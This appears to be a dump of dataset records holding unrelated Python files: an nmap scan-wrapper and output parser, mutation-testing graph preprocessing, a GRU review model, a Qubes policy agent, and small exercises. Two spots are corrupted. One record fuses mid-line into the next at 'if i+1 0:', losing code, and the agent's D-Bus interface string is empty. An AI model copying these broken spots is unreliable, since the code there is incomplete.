argv+=[\"--script-args\",\"tls.servername=%s\" % kwargs[\"servername\"] ]\n\n        
argv.append(hostadr)\n return argv\n\nclass NmapSSLEnumCiphers(NmapScriptHttp):\n script_name=\"ssl-enum-ciphers\"\n\n def _script_child(self,ret,child):\n if \"protocols\" not in ret:\n ret[\"protocols\"]=[]\n if \"results\" not in ret:\n ret[\"results\"]={}\n\n if child.tag==\"elem\":\n ret[\"results\"][child.attrib[\"key\"]]=child.text\n return ret\n\n ret[\"protocols\"].append(self._ssl_protocol(child))\n return ret\n\n def _ssl_protocol(self,elem):\n ret={\n \"name\": elem.attrib[\"key\"],\n \"ciphers\": []\n }\n for ch in elem:\n if ch.tag==\"elem\":\n ret[ch.attrib[\"key\"]]=ch.text\n continue\n if ch.attrib[\"key\"]!=\"ciphers\":\n ret[ch.attrib[\"key\"]]=[]\n for subch in ch:\n ret[ch.attrib[\"key\"]].append(subch.text)\n continue\n continue\n for subch in ch:\n d={}\n for ech in subch:\n d[ech.attrib[\"key\"]]=ech.text\n ret[\"ciphers\"].append(d)\n return ret\n\nclass NmapSSLCertificate(NmapScriptHttp):\n script_name=\"ssl-cert\"\n\n def _script_child(self,ret,child):\n if \"cert_info\" not in ret:\n ret[\"cert_info\"]={}\n\n if child.tag==\"elem\":\n ret[\"cert_info\"][child.attrib[\"key\"]]=child.text\n return ret\n\n if \"key\" in child.attrib and child.attrib[\"key\"] not in [\"extensions\"]:\n ret[child.attrib[\"key\"]]=self._table(child)\n return ret\n\n ret[\"extensions\"]=self._extensions(child)\n return ret\n\n def _extensions(self,elem):\n ret=[]\n print(\"++++\",elem.tag,elem.attrib)\n for ch in elem:\n ret.append(self._ext_table(ch))\n return ret\n\n def _ext_table(self,elem):\n ret={}\n for ch in elem:\n if ch.tag!=\"elem\": continue\n k=ch.attrib[\"key\"]\n if k==\"critical\":\n ret[k]=(ch.text.strip()==\"true\")\n else:\n ret[k]=ch.text\n return ret\n\n def _table(self,elem):\n ret={}\n for ch in elem:\n if ch.tag==\"elem\":\n ret[ch.attrib[\"key\"]]=ch.text\n return ret\n\nclass NmapHttpTrace(NmapScriptHttp):\n script_name=\"http-trace\"\n\n def _port(self,elem):\n ret={\n \"info\": elem.attrib,\n }\n for ch in elem:\n if ch.tag!=\"script\":\n ret[ch.tag]=ch.attrib\n continue\n ret[ch.tag]=ch.attrib[\"id\"]\n ret[\"output\"]=ch.attrib[\"output\"]\n \n if \"output\" not in ret:\n ret[\"output\"]=\"\"\n\n return ret\n\n# Nmap ssh\n\nclass NmapSSH2EnumAlgos(NmapScript):\n script_name=\"ssh2-enum-algos\"\n\n\n def _argv(self,hostadr,port,**kwargs):\n argv=[\n \"-oX\",\n \"-\",\n \"-Pn\",\n ]\n argv+=[\n \"-p\",\n str(port),\n ]\n\n if port not in [ 22, '22']:\n argv+=['-sV']\n\n argv+=[\n \"--script\",\n self.script_name,\n hostadr\n ]\n\n return argv\n\n def _script_child(self,ret,child):\n if \"algorithms\" not in ret:\n ret[\"algorithms\"]=[]\n ret[\"algorithms\"].append(self._algorithms(child))\n return ret\n\n def _algorithms(self,elem):\n ret={\n \"name\": elem.attrib[\"key\"],\n \"list\": []\n }\n for ch in elem:\n if ch.tag==\"elem\":\n ret[\"list\"].append(ch.text)\n continue\n return ret\n\nclass NmapMDNSDetection(NmapScriptUdp):\n script_name=\"dns-service-discovery\"\n","repo_name":"chiara-paci/grisu","sub_path":"lib/python/grisulib/commands/nmap.py","file_name":"nmap.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"130617943","text":"import sys\nsys.setrecursionlimit(500005)\n#sys.setrecursionlimit(10**9)\n#import pypyjit # this is for solving slow issue for pypy when using recursion but python will not need this (test will fail but submit works)\n#pypyjit.set_param('max_unroll_recursion=-1')\n\n\nN = int(input())\nS = str(input())\n\nans = 
[]\n\nfor i in range(len(S)):\n ans.append(S[i])\n if i+1 0: \n edges_list = []\n edge_label_list = []\n # edge_node_type_list = []\n for i, j, edge in G.edges(data=True):\n edge_type = edge['label'] \n edges_list.append((i, j))\n # edge_node_type_list.append(edge['type'])\n edge_label_list.append(edge_type)\n # edges_list.append((j, i))\n # edge_type_list.append(edge_type)\n if edge_type == VariableDeclaration:\n dv_mask_list.append(True)\n else:\n dv_mask_list.append(False)\n \n # data.edge_index: Graph connectivity in COO format with shape [2, num_edges]\n edge_index = torch.tensor(np.array(edges_list).T, dtype=torch.long )\n dv_mask = torch.tensor(np.array(dv_mask_list), dtype=bool)\n # data.edge_attr: Edge feature matrix with shape [num_edges, num_edge_features]\n # edge_type_list_np = np.array(edge_type_list)\n # print(np.array(edge_type_list))\n edge_attr = torch.tensor(np.array(edge_label_list), dtype=torch.long)\n # edge_node_attr = torch.tensor(np.array(edge_node_type_list), dtype=torch.long)\n #print(edge_attr.size())\n else: # mol has no bonds\n edge_index = torch.empty((2, 0), dtype=torch.long)\n edge_attr = torch.empty((0), dtype=torch.long)\n #edge_node_attr = torch.empty((2, 0), dtype=torch.long)\n dv_mask = torch.empty((0), dtype=torch.long)\n\n assert edge_index.shape[-1] == len(edge_attr), f\"{edge_index}, {edge_attr.shape}, {len(G.nodes()) }\"\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\n data.node_type = x_type\n data.variable_declar_mask = variable_declar_mask\n data.dv_mask = dv_mask\n data.ins_length = ins_length\n return data\n\n\n \ndef preprocess(class_method_id_json, graph_json , rawins_json\n , nodetype, edgetype, tokenizer_word2vec, dataname, graph_meta_info, datatype, outputdir):\n inputgraph_meta = json.load( open( graph_json ) )\n print(graph_json)\n rawins_meta = json.load( open( rawins_json ) )\n graph_id_list = [ ]\n graph_labels = []\n data_list = []\n print(class_method_id_json)\n for method_id in graph_meta_info: \n assert method_id in inputgraph_meta\n graph_string = inputgraph_meta[ method_id ]\n instructions = {}\n if method_id not in rawins_meta:\n print(f\"{class_method_id_json}, {method_id} \")\n instructions.update( rawins_meta[ method_id ][\"Local\"] )\n instructions.update( rawins_meta[ method_id ][\"Unit\"] )\n g_meta = nx_agraph.from_agraph(pygraphviz.AGraph(graph_string, directed=True))\n if len(g_meta.nodes) == 0:\n continue\n simple_graph = nx.DiGraph()\n \n id_rename_mapping = {}\n for (nid, info) in list( g_meta.nodes(data=True) ):\n ntype = int( nodetype[ info[\"type\"] ] )\n ins = instructions[nid]\n subwordsOfins = tokenizer_word2vec.get_tokens_id(ins.strip())\n feat = subwordsOfins + [ 0 ] * (100 - len(subwordsOfins) ) if len(subwordsOfins) < 100 else subwordsOfins[:100]\n simple_graph.add_node(nid, type= ntype, feat=feat,ins_length = min(100, len(subwordsOfins) ))\n\n for e1, e2, a in g_meta.edges( data=True ):\n if len( g_meta[e1][e2] ) > 1:\n #print( g_meta[e1][e2] )\n paralle_edges=[ edgetype[ g_meta[e1][e2][i][\"label\"]] for i in g_meta[e1][e2] ]\n paralle_edges = sorted(paralle_edges)\n if paralle_edges == [0, 1]:\n etype = int( edgetype[ \"DataDependence|ControlDependence\" ] ) \n if paralle_edges == [0, 2]:\n etype = int( edgetype[ \"Controlfow|DataDependence\" ] )\n if paralle_edges == [1, 2]:\n etype = int( edgetype[ \"Controlfow|ControlDependence\" ] ) \n if paralle_edges == [0, 1, 2]:\n etype= int( edgetype[ \"Controlfow|ControlDependence|ControlDependence\" ] )\n else:\n etype = int( edgetype[ 
a[\"label\"] ] ) \n simple_graph.add_edge( e1, e2, label=etype, type=[int(simple_graph.nodes[e1][\"type\"]), int(simple_graph.nodes[e2][\"type\"])] )\n \n\n # rename id from 0 to number of nodes - 1\n counter = 0\n for i in sorted(simple_graph):\n id_rename_mapping[i] = counter\n counter += 1\n simple_graph = nx.relabel_nodes( simple_graph, id_rename_mapping, copy=False )\n data_geometric = nx_to_graph_data_obj_simple( simple_graph )\n \n # print(data_geometric.y )\n data_geometric.graphID = int(method_id) \n if datatype == \"mutants\":\n data_geometric.mutantID = int(graph_meta_info[method_id][\"mid\"])\n #data_geometric.interaction_mid = int(graph_meta_info[method_id][\"interaction\"])\n data_geometric.interaction_graph_id = -1 #int(graph_meta_info[method_id][\"interaction_mutant_graph_id\"])\n data_geometric.mutant_type = int(graph_meta_info[method_id][\"mutator_label\"])\n data_geometric.label_k_binary = int( graph_meta_info[method_id][\"killed_label\"] )\n data_geometric.label_k_mul = int( graph_meta_info[method_id][\"killabel_mutator_label\"] )\n data_geometric.label_r_binary = int( graph_meta_info[method_id][\"relevance_label\"] )\n data_geometric.label_r_mul = int( graph_meta_info[method_id][\"relevance_mutator_label\"] )\n data_geometric.org_graph_id = int( graph_meta_info[method_id][\"org_graph_id\"])\n data_geometric.on_change = int( graph_meta_info[method_id][\"On_Change\"])\n data_geometric.submsuing_r = int( graph_meta_info[method_id][\"subming_relevant\"] )\n data_geometric.submsuing = int( graph_meta_info[method_id][\"subsuming\"] )\n # data_geometric.y= int( graph_meta_info[method_id][\"label\"] )\n graph_id_list.append( method_id )\n elif datatype == \"original\":\n data_geometric.mutantID = -1\n # data_geometric.interaction_mid = -1\n data_geometric.interaction_graph_id = -1\n data_geometric.mutant_type = -1\n data_geometric.label_k_binary = -1\n data_geometric.label_k_mul = -1\n data_geometric.label_r_binary = -1\n data_geometric.label_r_mul = -1\n data_geometric.org_graph_id = -1\n data_geometric.on_change = -1\n data_geometric.submsuing_r = -1\n data_geometric.submsuing = -1\n graph_id_list.append( int(method_id) )\n else:\n assert False\n data_list.append( data_geometric )\n #graph_labels.append( data_geometric.graph_label )\n \n del g_meta\n del simple_graph\n torch.save([data_list, graph_id_list ], osp.join(outputdir, f\"{dataname}.pt\"))\n return len(data_list)\n\n\ndef preprocess_relevance(pfolder):\n print(pfolder)\n mutant_meta = json.load( open( os.path.join(pfolder, \"mutants_info_graph_ids.json\") ) )\n # mutant_types = json.load( open( os.path.join(pfolder, \"mutants_type.json\") ) )\n if mutant_meta is None:\n print(f\"========================= {pfolder}\")\n return\n tokenizer_word2vec = TokenIns(\n word2vec_file=word2vec_file,\n tokenizer_file=tokenizer_file\n )\n nodetype = json.load( open(\"../tokens/instruction_type.json\") )\n edgetype = json.load( open(\"../tokens/edge_type.json\") )\n\n mutant2Graph = {}\n org2Mutant = set()\n for mutant_id in mutant_meta:\n mutant_meta[ mutant_id ][\"mid\"] = mutant_id\n assert mutant_meta[mutant_id][\"mutant_graph_id\"] not in mutant2Graph\n mutant2Graph[mutant_meta[mutant_id][\"mutant_graph_id\"]] = mutant_meta[ mutant_id ]\n assert \"subming_relevant\" in mutant_meta[ mutant_id ], f\"{pfolder}\"\n org2Mutant.add( mutant_meta[mutant_id][\"org_graph_id\"] )\n\n tasks = { \"original\":org2Mutant, \"mutants\":mutant2Graph }\n pid = os.path.basename( pfolder )\n #try:\n for k,v in tasks.items():\n outputdir = 
os.path.join( outputfolder, pid, \"raw\", k, \"graph\")\n os.makedirs(outputdir, exist_ok=True)\n class_method_id_json = os.path.join( pfolder, k, \"class_method_id_mapping.json\" )\n rawins_json = os.path.join(pfolder, k, \"RawIns.json\")\n for dataname in [ \"DV_CFG\", \"DV_PDG\" , \"ORG_PDG\" , \"ORG_CFG\"]: \n graph_json = os.path.join(pfolder, k, f\"{dataname}.json\")\n preprocess(class_method_id_json, graph_json , rawins_json\n , nodetype, edgetype, tokenizer_word2vec, dataname, v, k,outputdir)\n # except Exception as e:\n # print(e)\n # outputdir = os.path.join( outputfolder, pid)\n # shutil.rmtree(outputdir)\n\ndef copy_folder(pfolder):\n mutant_meta =os.path.join(pfolder, \"mutants_info_graph_ids.json\") \n pid = os.path.basename( pfolder )\n outputdir = os.path.join( outputfolder, pid, \"raw\", \"mutants\")\n try:\n shutil.copy( mutant_meta, outputdir)\n except:\n print(outputdir)\n \ndef run_copy(data_folder):\n eggs = []\n for project in os.listdir( data_folder ):\n pfolder = os.path.join( data_folder, project ) \n for c in os.listdir( os.path.join( pfolder ) ):\n eggs.append( os.path.join( pfolder, c ) )\n with Pool(15) as p:\n p.map(copy_folder, eggs) \n\ndef run(data_folder):\n eggs = []\n for project in os.listdir( data_folder ):\n pfolder = os.path.join( data_folder, project ) \n for c in os.listdir( os.path.join( pfolder ) ):\n eggs.append( os.path.join( pfolder, c ) )\n with Pool(15) as p:\n p.map(preprocess_relevance, eggs)\n\n\nimport argparse\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-o\", \"--output\", dest=\"output\", default=\"../dataset/pittest\")\n parser.add_argument(\"-i\", \"--input\", dest=\"input\", default=\"./relevance_java_dot_byteinfo\")\n args = parser.parse_args()\n outputfolder = args.output\n run( args.input )\n run_copy(args.input )\n \n\n \n \n\n \n\n\n","repo_name":"Marvinmw/few_shot_learning","sub_path":"preprocess/process_relevance_pytorchgraph.py","file_name":"process_relevance_pytorchgraph.py","file_ext":"py","file_size_in_byte":12163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70381531166","text":"from random import randint\r\n\r\n#empty game board\r\nboard = []\r\n\r\n#creating board\r\nfor x in range(0, 5):\r\n board.append([\"O\"] * 5)\r\n\r\n# print a square board\r\ndef print_board(board):\r\n for row in board:\r\n print(\"\".join(row))\r\n\r\n\r\nprint_board(board)\r\n\r\n#position of ship, y-axis\r\ndef random_row(board):\r\n return randint(0, len(board) - 1)\r\n\r\n#position of ship, x-axis\r\ndef random_col(board):\r\n return randint(0, len(board[0]) - 1)\r\n\r\n#print position of ship\r\nship_row = random_row(board)\r\nship_col = random_col(board)\r\nprint(ship_row)\r\nprint(ship_col)\r\n\r\n#max 4 turns\r\nfor turn in range(4):\r\n\r\n print(\"Turn\", turn + 1)\r\n guess_row = int(input(\"Guess Row: \"))\r\n guess_col = int(input(\"Guess Col: \"))\r\n\r\n if guess_row == ship_row and guess_col == ship_col:\r\n #correct assumption\r\n print(\"Congratulations! 
You sank my battleship!\")\r\n        break\r\n    #out of range\r\n    elif guess_row not in range(5) or guess_col not in range(5):\r\n        print(\"Oops, that's not even in the ocean.\")\r\n    #already guessed\r\n    elif board[guess_row][guess_col] == \"X\":\r\n        print(\"You guessed that one already.\")\r\n    #unsuccessful attempts\r\n    else:\r\n        print(\"You missed my battleship!\")\r\n    board[guess_row][guess_col] = \"X\"\r\n\r\n    if turn == 3:\r\n        print(\"Game Over\")\r\nprint_board(board)\r\n","repo_name":"FirePing32/battleship-game","sub_path":"Battleship Game.py","file_name":"Battleship Game.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"44886636128","text":"'''\nWe want to write a program that, given a number typed on\nthe keyboard, tells us on screen whether it is a prime number.\nA prime number must be divisible only by 1 and by itself.\nFor example, 11 is prime, since it can be divided by 1 and\nby 11, but not by 2, 3, 4, 5, 6, 7, 8, 9 or 10.\n'''\n\n\n#prime numbers program\n\n\n#variables\n\ncont = 2\nnum = 0\nresultado = \"is prime\"\n#code\n\nprint (\"Enter a number to check whether it is prime\")\nnum = int (input())\n\nwhile (cont < num):\n    if (num % cont == 0):\n        resultado = \"is not prime\"\n    cont = cont + 1\nif (num == 1):\n    resultado = \"is not prime\"\nprint (\"The number\", num, resultado)\n","repo_name":"alexcatmu/CFGS_DAM","sub_path":"PRIMERO/python/ejercicio24.py","file_name":"ejercicio24.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"43984418264","text":"import torch\nimport torch.nn as nn\nimport torch.nn.utils.rnn as rnn_utils\nimport torch.nn.functional as F\n\nclass _ENC_NETWORK(nn.Module):\n    def __init__(self, vocab_obj, args):\n        super(_ENC_NETWORK, self).__init__()\n\n        # self.m_device = device\n        self.m_user_size = vocab_obj.user_size\n        self.m_item_size = vocab_obj.item_size\n        self.m_vocab_size = vocab_obj.vocab_size\n\n        self.m_hidden_size = args.hidden_size\n        self.m_layers_num = args.layers_num\n        self.m_dropout_rate = args.dropout\n        self.m_latent_size = args.latent_size\n\n        self.m_embedding_size = args.embedding_size\n\n        self.m_embedding = nn.Embedding(self.m_vocab_size, self.m_embedding_size)\n        self.m_user_embedding = nn.Embedding(self.m_user_size, self.m_latent_size)\n        self.m_item_embedding = nn.Embedding(self.m_item_size, self.m_latent_size)\n\n        user_cnt = torch.zeros((self.m_user_size, 1))\n        item_cnt = torch.zeros((self.m_item_size, 1))\n\n        self.register_buffer(\"m_user_cnt\", user_cnt)\n        self.register_buffer(\"m_item_cnt\", item_cnt)\n\n        self.m_user_encoder = _ENCODER(self.m_embedding, self.m_latent_size, self.m_hidden_size, self.m_layers_num, self.m_dropout_rate)\n        self.m_item_encoder = _ENCODER(self.m_embedding, self.m_latent_size, self.m_hidden_size, self.m_layers_num, self.m_dropout_rate)\n\n        self.m_user_decoder = _DECODER(self.m_embedding, self.m_embedding_size, self.m_latent_size, self.m_hidden_size, self.m_layers_num, self.m_dropout_rate)\n        self.m_item_decoder = _DECODER(self.m_embedding, self.m_embedding_size, self.m_latent_size, self.m_hidden_size, self.m_layers_num, self.m_dropout_rate)\n\n        self.m_output2vocab = nn.Linear(self.m_hidden_size, self.m_vocab_size)\n\n        # self = self.to(self.m_device)\n\n    def forward(self, reviews, review_lens, user_ids, item_ids):\n\n        ### obtain user representation\n        user_hidden = self.m_user_encoder(reviews, review_lens)\n\n        
### obtain item representation\n item_hidden = self.m_item_encoder(reviews, review_lens)\n\n user_output = self.m_user_decoder(reviews, user_hidden)\n item_output = self.m_item_decoder(reviews, item_hidden)\n\n user_logits = self.m_output2vocab(user_output.view(-1, user_output.size(2)))\n item_logits = self.m_output2vocab(item_output.view(-1, item_output.size(2)))\n\n return user_logits, item_logits\n\n def update_user_item(self, reviews, review_lens, user_ids, item_ids):\n \n user_hidden = self.m_user_encoder(reviews, review_lens)\n user_one_hot = F.one_hot(user_ids, self.m_user_size).type(user_hidden.dtype)\n user_embedding_sum = user_one_hot.transpose(0, 1) @ user_hidden\n\n self.m_user_embedding.weight.data.add_(user_embedding_sum)\n\n self.m_user_cnt.add_(torch.sum(user_one_hot, dim=0).unsqueeze(1))\n\n item_hidden = self.m_item_encoder(reviews, review_lens)\n item_one_hot = F.one_hot(item_ids, self.m_item_size).type(item_hidden.dtype)\n item_embedding_sum = item_one_hot.transpose(0, 1) @ item_hidden\n\n self.m_item_embedding.weight.data.add_(item_embedding_sum)\n\n self.m_item_cnt.add_(torch.sum(item_one_hot, dim=0).unsqueeze(1))\n\n def normalize_user_item(self):\n self.m_user_embedding.weight.data.div_(self.m_user_cnt)\n self.m_item_embedding.weight.data.div_(self.m_item_cnt)\n # self.m_item_embedding.weight.data = self.m_item_embedding.weight.data/self.m_item_cnt\n\n if (self.m_user_cnt != 0).sum() != self.m_user_size:\n print(\"user num\", (self.m_user_cnt == 0).sum())\n print(\"user num\", self.m_user_size)\n for i, _ in enumerate(self.m_user_cnt):\n if self.m_user_cnt[i, 0] == 0:\n print(\"user cnt zeros\", self.m_user_cnt[i, 0])\n\n if torch.isinf(self.m_user_embedding.weight).any():\n print(\"normalize user_embedding inf\", self.m_user_embedding.weight)\n \n if torch.isinf(self.m_item_embedding.weight).any():\n print(\"normalize item_embedding inf\", self.m_item_embedding.weight)\n\n self.m_user_embedding.weight.requires_grad=False\n self.m_item_embedding.weight.requires_grad=False\n self.m_embedding.weight.requires_grad=False\n self.m_output2vocab.weight.requires_grad=False\n\nclass _ENCODER(nn.Module):\n def __init__(self, embedding, latent_size, hidden_size, layers_num=1, dropout=0.3):\n super(_ENCODER, self).__init__()\n \n self.m_dropout_rate = dropout\n # self.m_device = device\n\n self.m_embedding = embedding\n self.m_embedding_dropout = nn.Dropout(self.m_dropout_rate)\n\n self.m_latent_size = latent_size\n self.m_hidden_size = hidden_size\n self.m_layers_num = layers_num\n\n self.m_gru = nn.GRU(self.m_hidden_size, self.m_hidden_size, self.m_layers_num, dropout=self.m_dropout_rate, bidirectional=True)\n \n self.m_hidden2latent = nn.Linear(self.m_hidden_size*2, self.m_latent_size)\n \n # self = self.to(self.m_device)\n\n def forward(self, x, x_len, hidden=None):\n # if not hasattr(self, '_flattened'):\n # self.m_gru.flatten_parameters()\n # setattr(self, '_flattened', True)\n\n batch_size = x.size(0)\n input_embedding = self.m_embedding(x)\n input_embedding = self.m_embedding_dropout(input_embedding)\n\n encoder_outputs, _ = self.m_gru(input_embedding)\n\n # first_dim_index = torch.arange(batch_size).to(self.m_device)\n first_dim_index = torch.arange(batch_size).to(input_embedding.device)\n second_dim_index = (x_len-1).long()\n\n last_en_hidden = encoder_outputs[first_dim_index, second_dim_index, :].contiguous()\n\n en_latent = self.m_hidden2latent(last_en_hidden)\n\n return en_latent\n\nclass _DECODER(nn.Module):\n def __init__(self, embedding, embedding_size, 
latent_size, hidden_size, layers_num=1, dropout=0.3):\n super(_DECODER, self).__init__()\n # self.m_device = device\n\n self.m_latent_size = latent_size\n self.m_dropout_rate = dropout\n self.m_embedding_size = embedding_size\n \n self.m_tanh = nn.Tanh()\n self.m_latent2output = nn.Linear(self.m_latent_size, self.m_embedding_size)\n\n self.m_embedding = embedding\n self.m_embedding_dropout = nn.Dropout(self.m_dropout_rate)\n\n self.m_hidden_size = hidden_size\n self.m_layers_num = layers_num\n \n self.m_gru = nn.GRU(self.m_hidden_size, self.m_hidden_size, self.m_layers_num, dropout=self.m_dropout_rate, bidirectional=False)\n\n # self = self.to(self.m_device)\n\n def forward(self, x, en_latent, hidden=None):\n # if not hasattr(self, '_flattened'):\n # self.m_gru.flatten_parameters()\n # setattr(self, '_flattened', True)\n\n en_hidden = self.m_tanh(en_latent)\n de_hidden = self.m_latent2output(en_hidden)\n\n batch_size = x.size(0)\n input_embedding = self.m_embedding(x)\n input_embedding = self.m_embedding_dropout(input_embedding)\n\n de_hidden = de_hidden.unsqueeze(1)\n de_hidden = de_hidden.expand(de_hidden.size(0), input_embedding.size(1), de_hidden.size(-1))\n\n output_embedding = input_embedding + de_hidden\n\n output, hidden = self.m_gru(output_embedding)\n output = output.contiguous()\n\n return output\n\nclass _GEN_NETWORK(nn.Module):\n def __init__(self, vocab_obj, args):\n super().__init__()\n\n # self.m_device = device\n\n self.m_hidden_size = args.hidden_size\n self.m_latent_size = args.latent_size\n \n self.m_max_sequence_len = args.max_seq_length\n self.m_layers_num = args.layers_num\n self.m_bidirectional = args.bidirectional\n self.m_embedding_size = args.embedding_size\n self.m_aspect_num = args.aspect_num\n\n self.m_sos_idx = vocab_obj.sos_idx\n self.m_eos_idx = vocab_obj.eos_idx\n self.m_pad_idx = vocab_obj.pad_idx\n self.m_unk_idx = vocab_obj.unk_idx\n self.m_vocab_size = vocab_obj.vocab_size\n self.m_user_num = vocab_obj.user_size\n self.m_item_num = vocab_obj.item_size\n\n self.m_embedding = nn.Embedding(self.m_vocab_size, self.m_embedding_size)\n self.m_user_embedding = nn.Embedding(self.m_user_num, self.m_latent_size)\n self.m_item_embedding = nn.Embedding(self.m_item_num, self.m_latent_size)\n\n self.m_aspect_embedding = nn.Linear(self.m_embedding_size, self.m_aspect_num, bias=False)\n\n self.m_tanh = nn.Tanh()\n self.m_latent2output = nn.Linear(self.m_latent_size, self.m_embedding_size)\n\n self.m_de_strategy = args.de_strategy\n\n self.m_decoder_rnn = nn.GRU(self.m_embedding_size, self.m_hidden_size, num_layers=self.m_layers_num, bidirectional=False, batch_first=True)\n\n self.m_gating_network = nn.Sequential(nn.Linear(self.m_hidden_size, self.m_embedding_size), nn.Tanh(), nn.Linear(self.m_embedding_size, 2))\n \n self.m_user_aspect = nn.Linear(self.m_latent_size, self.m_embedding_size, bias=False)\n self.m_item_aspect = nn.Linear(self.m_latent_size, self.m_embedding_size, bias=False)\n \n self.m_output2vocab = nn.Linear(self.m_hidden_size, self.m_vocab_size)\n\n if self.m_de_strategy == \"attn\":\n self.m_attn = nn.Sequential(nn.Linear(self.m_hidden_size+self.m_latent_size, self.m_hidden_size), nn.Tanh(), nn.Linear(self.m_hidden_size, 1)) \n\n # self = self.to(self.m_device)\n \n def f_init_user_item_word(self, E_network):\n E_network.eval()\n\n self.m_embedding.weight.requires_grad=False\n self.m_user_embedding.weight.requires_grad=False\n self.m_item_embedding.weight.requires_grad=False\n self.m_output2vocab.weight.requires_grad=False\n\n 
self.m_embedding.weight.data.copy_(E_network.m_embedding.weight.data)\n\n self.m_user_embedding.weight.data.copy_(E_network.m_user_embedding.weight.data)\n \n self.m_item_embedding.weight.data.copy_(E_network.m_item_embedding.weight.data)\n \n self.m_output2vocab.weight.data.copy_(E_network.m_output2vocab.weight.data)\n \n def f_gumbel_softmax(self, logits, eps=1e-20, temp=1e-3):\n shape = logits.size()\n U = torch.rand(shape)\n gumbel_sample = -torch.log(-torch.log(U+eps)+eps).to(logits.device)\n y = logits + gumbel_sample\n \n return F.softmax(y/temp, dim=-1)\n\n def forward(self, input_de_sequence, user_ids, item_ids, random_flag):\n\n batch_size = input_de_sequence.size(0)\n de_batch_size = input_de_sequence.size(0)\n de_len = input_de_sequence.size(1)\n\n input_de_embedding = self.m_embedding(input_de_sequence)\n\n input_user_hidden = self.m_user_embedding(user_ids)\n input_item_hidden = self.m_item_embedding(item_ids)\n\n ### m_aspect_word_embedding: voc_size*aspect_size\n self.m_aspect_word_embedding = F.softmax(self.m_aspect_embedding(self.m_embedding.weight), dim=0)\n\n ### m_aspect_word_embedding: aspect_size*voc_size\n self.m_aspect_word_embedding = self.m_aspect_word_embedding.transpose(0, 1)\n\n ### aspect_prop: batch_size*aspect_size\n aspect_prop = self.m_aspect_embedding(self.m_user_aspect(input_user_hidden)+self.m_item_aspect(input_item_hidden))\n\n # print(\"aspect_prop\", aspect_prop.size())\n # print(\"aspect_prop device\", aspect_prop.device)\n # print(\"self.m_aspect_word_embedding device\", self.m_aspect_word_embedding.device)\n # print(\"m_aspect_word_embedding\", self.m_aspect_word_embedding.size())\n ### aspect_word_prob: batch_size*voc_size\n # aspect_word_prob = F.softmax(aspect_prop @ self.m_aspect_word_embedding, dim=-1)\n aspect_word_prob = aspect_prop @ self.m_aspect_word_embedding\n if torch.isnan(aspect_word_prob).any():\n print(\"aspect_word_prob\", aspect_word_prob)\n exit()\n\n output = []\n # user_item_hidden_i = self.m_latent2output(user_item_hidden_init)\n\n hidden = None\n decode_strategy = self.m_de_strategy\n\n if decode_strategy == \"attn\":\n \"\"\"\n attention mechanism output\n \"\"\"\n\n for de_step_i in range(de_len):\n input_de_step_i = input_de_embedding[:, de_step_i, :]\n # input_de_step_i = input_de_step_i + user_item_hidden_i\n input_de_step_i = input_de_step_i.unsqueeze(1)\n \n output_step_i, hidden = self.m_decoder_rnn(input_de_step_i, hidden)\n \n ### output_step_i: batch_size*hidden_size\n output_step_i = output_step_i.squeeze(1)\n\n ### word_prob: batch_size*voc_size\n # word_prob_i = F.softmax(self.m_output2vocab(output_step_i), dim=-1)\n word_prob_i = self.m_output2vocab(output_step_i)\n if torch.isnan(word_prob_i).any():\n print(\"word_prob_i\", word_prob_i)\n exit()\n \n ### gate: batch_size*2\n gate_i = self.m_gating_network(output_step_i)\n\n gate_i = self.f_gumbel_softmax(gate_i) \n\n # gate_i = F.softmax(gate_i)\n\n ### gate_aspect_word_prob: batch_size*voc_size\n gate_aspect_word_prob_i = gate_i[:, 0].unsqueeze(1)*aspect_word_prob\n\n ### gate_word_prob: batch_size*voc_size\n gate_word_prob_i = gate_i[:, 1].unsqueeze(1)*word_prob_i\n\n output_prob_i = gate_aspect_word_prob_i + gate_word_prob_i\n\n output.append(output_prob_i.unsqueeze(1))\n\n output = torch.cat(output, dim=1)\n\n output = output.contiguous()\n \n if torch.isnan(output).any():\n print(\"output\", output)\n exit()\n\n return output\n\n### obtain the representation of users and items. 
\n\n","repo_name":"RenqinCai/PersonalizedReviewCopy","sub_path":"EMKRefSeq/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"22009189557","text":"import pydbus\n# pylint: disable=import-error,wrong-import-position\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import GLib\n# pylint: enable=import-error\n\nimport qubespolicy.rpcconfirmation\nimport qubespolicy.policycreateconfirmation\n# pylint: enable=wrong-import-position\n\nclass PolicyAgent(object):\n # pylint: disable=too-few-public-methods\n dbus = \"\"\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \"\"\"\n\n @staticmethod\n def Ask(source, service_name, targets, default_target,\n icons):\n # pylint: disable=invalid-name\n entries_info = {}\n for entry in icons:\n entries_info[entry] = {}\n entries_info[entry]['icon'] = icons.get(entry, None)\n\n response = qubespolicy.rpcconfirmation.confirm_rpc(\n entries_info, source, service_name,\n targets, default_target or None)\n return response or ''\n\n @staticmethod\n def ConfirmPolicyCreate(source, service_name):\n # pylint: disable=invalid-name\n\n response = qubespolicy.policycreateconfirmation.confirm(\n source, service_name)\n return response\n\ndef main():\n loop = GLib.MainLoop()\n bus = pydbus.SystemBus()\n obj = PolicyAgent()\n bus.publish('org.qubesos.PolicyAgent', obj)\n loop.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"iamforprog/All_respository","sub_path":"qubespolicy/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"69933415966","text":"from unittest import TestCase\n\nfrom tensor_dynamic.lazyprop import lazyprop, clear_all_lazyprops, subscribe_to_lazy_prop, unsubscribe_from_lazy_prop, \\\n 